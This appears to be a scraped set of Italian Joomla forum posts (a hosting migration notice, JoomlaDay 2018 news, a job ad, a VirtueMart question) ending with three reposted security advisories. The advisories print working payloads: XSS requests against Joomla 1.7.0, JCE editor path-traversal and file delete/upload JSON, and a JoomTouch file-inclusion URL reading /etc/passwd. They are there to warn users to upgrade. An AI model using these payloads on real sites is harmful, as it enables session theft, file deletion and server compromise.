Ciao a tutti
Oggi sono state apportate alcune modifiche al forum:

• migrazione alla nuova piattaforma di hosting
• attivazione HTTPS (finalmente)
• aggiornamento SMF.

Problemi noti

• Alcuni degli avatar (foto profilo) degli utenti non sono visualizzati. Nonostante il ripristino dei file, alcuni avatar non sono più visibili. Qualora il vostro avatar non fosse più visualizzato, vi invito a caricarlo nuovamente.

Riscontri altri problemi?
Purtroppo si sa che in seguito a migrazioni/modifiche/aggiornamenti di siti e/o forum di grandi dimensioni (e questo lo è), potrebbero verificarsi problemi/errori, qualora notaste qualche malfunzionamento, vi invito a farmelo presente, commentando questo post oppure inviando una mail a info@joomla.it

Grazie per la preziosa collaborazione!

Sono disponibili i biglietti per il JoomlaDay Italia 2018 che si terrà a Torino il 27 ottobre 2018!
Come di consueto, l’ingresso all’evento è gratuito previa iscrizione tramite l’apposito modulo, che vi permetterà di prenotare il vostro posto. Vi ricordiamo infatti che il numero dei partecipanti è limitato ai primi 700 che si iscriveranno.

Per ulteriori informazioni sul JoomlaDay:

• https://www.joomladay.it/it/
• https://www.joomladay.it/it/programma (disponibile a breve il programma completo degli interventi)
• https://www.joomladay.it/it/location (Istruzioni su come raggiungere la location)
• http://www.joomla.it/224-help-3x/8868-aperte-le-iscrizioni-al-joomladay-torino-2018.html
• http://www.joomla.it/notizie/8872-joomladay-2018-prime-indiscrezioni-sul-programma.html
• http://www.joomla.it/notizie/8877-oltre-mille-minuti-di-joomla-al-joomladay-italia-2018.html

Il Progetto Joomla è lieto di annunciare la disponibilità di Joomla 4.0 Alpha 4 per i test.

Informazioni sulla versione Alpha 4
Link all'Articolo: http://www.joomla.it/219-notizie/8869-joomla-4-e-all-orizzonte-alpha-4-disponibile.html

Questo topic è stato spostato in Joomla! 3.

http://forum.joomla.it/index.php?topic=268938.0

Start-up che lavora nel settore food, con sede operativa a Milano (MI). Più precisamente l'azienda propone un servizio di delivery integrato di piatti gourmet, sani e bilanciati.
In particolare sono richieste competenze per:
* Utilizzo Joomla! ed Hikashop
* Competenze CSS
* Programmazione, HTML, PHP e JavaScript (conoscenza di base jQuery);
Saranno ritenute qualificanti o preferenziali
- Esperienza nello sviluppo e implementazione di siti web e CMS
- Bilinguismo italiano e inglese.

Sede di lavoro: Milano (MI)
Settore: Food
Orario: 25 ore/settimana
Contratto: Stage
Titolo di Studio: Diploma di Maturità
Retribuzione: retribuzione 500€/mese (variabile in base all'esperienza), con ottime possibilità di ulteriori sviluppi

Inviate i vostri CV a info@featfood.it
Per informazioni: Andrea Lippolis | Lorenzo Danese

Feat Food Srl - P.IVA 04695050759

ho un paio di domande da farvi su VirtueMart dato che non ho mai avuto modo di interfacciarmici in maniera diretta e seria ed il primo approccio non è stato dei migliori.

1) Esiste un modo per evitare che i visitatori vedano i prezzi, ma che questi siano visibili solo agli utenti registrati? (Nella versione 1.x era fattibile tramite un'impostazione, ma nella 2.x non trovo l'opzione corrispondente)

2) Esiste un modo per avere un calcolo della marginalità? Mi spiego: inserisco i prodotti e specifico il prezzo di costo per il venditore, cioè il prezzo che io pago ai miei fornitori, il sistema sulla base di questo prezzo fa un confronto con il prezzo finale di vendita e mi dice quanto ho guadagnato su ogni fattura? Da quanto ho visto con i campi prezzo c'è un po' di confusione (o sono io un incompetente, cosa probabile). Chiarisco, a quanto ho capito io, nel campo prezzo di costo devo specificare il prezzo IVA esclusa del prodotto (che in realtà non è il prezzo che io venditore pago il prodotto), automaticamente il sistema mi applica l'IVA (10% su alcuni prodotti, 21% sugli altri). Io non ho un modo per sapere quindi quanto guadagno dalle vendite? Devo ricorrere a qualche plugin?


Grazie!
   
 

Salve gente,
nel wiki di Joomla 2.5 è disponibile la traduzione della guida "Converting a template for Joomla 3" pubblicata originariamente sul wiki di Joomla.org

Attenzione, la traduzione, così come l'originale, è ancora un work in progress, quindi è soggetto a modifiche/integrazioni/aggiornamenti.

Il link alla pagina del wiki italiano:
http://www.joomla.it/mediawiki/index.php/Joomla!_2.5:Convertire_un_template_per_Joomla_3

Subito dopo la pubblicazione del pacchetto di aggiornamento alla nuova versione di Joomla 1.7.x, per la precisione la 1.7.1 sono comparsi in rete gli avvisi relativi agli exploit possibili sulla versione 1.7.0.

Seguono i dati della vulnerabilità e consiglio a tutti coloro che utilizzino ancora Joomla 1.7.0 di aggiornare rapidamente alla versione 1.7.1.
Ricordo inoltre che la versione 1.6.x di Joomla non è più supportata, pertanto è consigliato l'aggiornamento al nuovo ramo 1.7.x

Joomla! 1.7.0 | Multiple Cross Site Scripting (XSS) Vulnerabilities
 
 
 
 1. OVERVIEW
 
 Joomla! 1.7.0 (stable version) is vulnerable to multiple Cross Site
 Scripting issues.
 
 
 2. BACKGROUND
 
 Joomla is a free and open source content management system (CMS) for
 publishing content on the World Wide Web and intranets. It comprises a
 model–view–controller (MVC) Web application framework that can also be
 used independently.
 Joomla is written in PHP, uses object-oriented programming (OOP)
 techniques and software design patterns, stores data in a MySQL
 database, and includes features such as page caching, RSS feeds,
 printable versions of pages, news flashes, blogs, polls, search, and
 support for language internationalization.
 
 
 3. VULNERABILITY DESCRIPTION
 
 Several parameters (searchword, extension, asset, author ) in Joomla!
 Core components are not properly sanitized upon submission to the
 /index.php url, which allows attacker to conduct Cross Site Scripting
 attack. This may allow an attacker to create a specially crafted URL
 that would execute arbitrary script code in a victim's browser.
 
 
 4. VERSION AFFECTED
 
 1.7.0 <=
 
 
 5. PROOF-OF-CONCEPT/EXPLOIT
 
 
 component: com_search, parameter: searchword (Browser: IE, Konqueror)
 =====================================================================
 
 
 [REQUEST]
 POST /joomla17_noseo/index.php HTTP/1.1
 Host: localhost
 Accept: */*
 Accept-Language: en
 User-Agent: MSIE 8.0
 Connection: close
 Referer: http://localhost/joomla17_noseo
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 456
 
 
 task=search&Itemid=435&searchword=Search';onunload=function(){x=con
 firm(String.fromCharCode(89,111,117,39,118,101,32,103,111,116,32,97,32,109,
 101,115,115,97,103,101,32,102,114,111,109,32,65,100,109,105,110,105,115,116
 ,114,97,116,111,114,33,10,68,111,32,121,111,117,32,119,97,110,116,32,116,11
 1,32,103,111,32,116,111,32,73,110,98,111,120,63));alert(String.fromCharCode
 (89,111,117,39,118,101,32,103,111,116,32,88,83,83,33));};//xsssssssssss&
 ;option=com_search
 [/REQUEST]
 
 
 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 
 User Login is required to execute the following XSSes.
 
 
 Parameter: extension, Component: com_categories
 ====================================================
 
 http://localhost/joomla17_noseo/administrator/index.php?option=com_categori
 es&extension=com_content%20%22onmouseover=%22alert%28/XSS/%29%22style=%
 22width:3000px!important;height:3000px!important;z-index:999999;position:ab
 solute!important;left:0;top:0;%22%20x=%22
 
 
 Parameter: asset , Component: com_media
 ====================================================
 
 http://localhost/joomla17_noseo/administrator/index.php?option=com_media&am
 p;view=images&tmpl=component&e_name=jform_articletext&asset=1%2
 2%20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;heigh
 t:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;
 %22x=%22&author=
 
 
 Parameter: author, Component: com_media
 ====================================================
 
 http://localhost/joomla17_noseo/administrator/index.php?option=com_media&am
 p;view=images&tmpl=component&e_name=jform_articletext&asset=&am
 p;author=1%22%20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!imp
 ortant;height:3000px!important;z-index:999999;position:absolute!important;l
 eft:0;top:0;%22x=%22
 
 
 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 
 
 6. IMPACT
 
 Attackers can compromise currently logged-in user/administrator
 session and impersonate arbitrary user actions available under
 /administrator/ functions.
 
 
 7. SOLUTION
 
 Upgrade to Joomla! 1.7.1-stable or higher.
 
 
 8. VENDOR
 
 Joomla! Developer Team
 http://www.joomla.org
 
 
 9. CREDIT
 
 This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
 Ethical Hacker Group, Myanmar.
 
 
 10. DISCLOSURE TIME-LINE
 
 2011-07-29: notified vendor
 2011-09-26: patched version, 1.7.1-stable, released
 2011-09-29: vulnerability disclosed
 
 
 11. REFERENCES
 
 Original Advisory URL:
 http://yehg.net/lab/pr0js/advisories/joomla/core/%5Bjoomla_1.7.0-stable%5D_
 cross_site_scripting%28XSS%29
 Vendor Advisory URLs:
 http://developer.joomla.org/security/news/367-20110901-core-xss-vulnerabili
 ty
 http://developer.joomla.org/security/news/368-20110902-core-xss-vulnerabili
 ty
 

Diverse vulnerabilità trovate nel popolare editor JCE versione 2.0.1.0 e precedenti.
Non è stata ancora rilasciata una patch correttiva, si consiglia di visitare il sito web dello sviluppatore.

Temporaneamente si consiglia di restringere i permessi in scrittura (quindi all'editor) esclusivamente agli utenti fidati in attesa della nuova versione.

#######################################

#

# Title: JCE Joomla Extension <=2.0.10 Multiple Vulnerabilities

# Vendor: www.joomlacontenteditor.net

# Exploit: Available

# Vulnerable Version: 2.0.10 (Image Manager 1.5.7.13, Media Manager

1.5.6.3, Template Manager 1.5.5, File Manager 1.5.4.1 & prior versions

also may be affected)

# Impact: High

# Fix: N/A

###################################################################################

####################

1. Description:

####################

JCE is an extension for Joomla!, that provides you with a set of

wysiwyg editor tools that makes the job of writing articles for your

Joomla! site a little bit easier.

In a nutshell, it provides access to many of the features you may

be used to using in Word or OpenOffice etc.

####################

2. Vulnerabilities:

####################

2.1. Path Traversal Flaws. Path Traversal in "Image Manager",

"Media Manager", "Template Manager" and "File Manager" section.

2.1.1. Exploit:

Check the exploit/POC section.

2.2. Path Manipulation Flaws. Path Manipulation in "Image Manager",

"Media Manager", "Template Manager", "File Manager" section. Attackers

can delete any file or upload files to all the directories of the server.

2.2.1. Exploit:

Check the exploit/POC section.

2.3. Unsafe function Flaws. Attackers can use unsafe function

called "folderRename" for changing Image type extension (.jpg, .gif,

.png & etc.) to any extension like .htaccess or .php in "Image Manager",

"Media Manager", "Template Manager" and "File Manager" section.

2.3.1. Exploit:

Check the exploit/POC section.

####################

3. Exploits/PoCs:

####################

Original Exploit URL: http://www.bugreport.ir/78/exploit.htm

3.1. Path Traversal Flaws. Path Traversal in "Image Manager",

"Media Manager", "Template Manager" and "File Manager" section.

-------------

Path Traversal and see all directories:

Step 1 +--> Click on root (left bar)

Step 2 +--> Use Proxy (like burp) for changing path:

json={"fn":"getItems","args":["/","all",0,""]}

to

json={"fn":"getItems","args":["../../","all",0,""]}

-------------

3.2. Path Manipulation Flaws. Path Manipulation in "Image Manager",

"Media Manager", "Template Manager", "File Manager" section. Attackers

can delete any file or upload files to all the directories of the server.

-------------

For uploading file:

Step 1 +--> Upload a file with image type extension like azizi.jpg

Step 2 +--> Click on root (left bar)

Step 3 +--> Use Proxy (like burp) and change "json" parameter

to json={"fn":"fileCopy","args":["/azizi.jpg","../../"]}

Now azizi.jpg copied to root directory.

For deleting file:

Step 1 +--> Click on root (left bar)

Step 2 +--> Use Proxy (like burp) and change "json" parameter

to json={"fn":"fileDelete","args":"../../index.php"}

Now index.php has been deleted.

-------------

3.3. Unsafe function Flaws. Attackers can use unsafe function for

changing Image type extension (.jpg, .gif, .png & etc.) to any extension

like .htaccess or .php in "Image Manager", "Media Manager", "Template

Manager" and "File Manager" section.

-------------

For uploading file with executable extension:

Step 1 +--> Upload a file with image type extension like azizi.jpg

Step 2 +--> Click on root (left bar)

Step 3 +--> Use Proxy (like burp) and change "json" p

####################

4. Solution:

####################

Restricting and granting only trusted users having access to

resources and wait for vender patch.

Joomla Component JoomTouch 1.0.2 Local File Inclusion Vulnerability

[o] JoomTouch Joomla Component <= Local File Inclusion Vulnerability
 
 Software : com_joomtouch ver 1.0.2
 Vendor   : http://www.joomtouch.com/
 
 ===========================================================================
 =====
 
 [o] Exploit
 
 
 http://localhost/[path]/index.php?option=com_joomtouch&controller=[LFI]
 
 
 
 [o] PoC
 
 
 http://localhost/[path]/index.php?option=com_joomtouch&controller=../..
 /../../../../../../../../../../../../../../../../../etc/passwd%00
 
Non si hanno ulteriori informazioni sulla presunta vulnerabilità né sul ciclo di sviluppo dell'estensione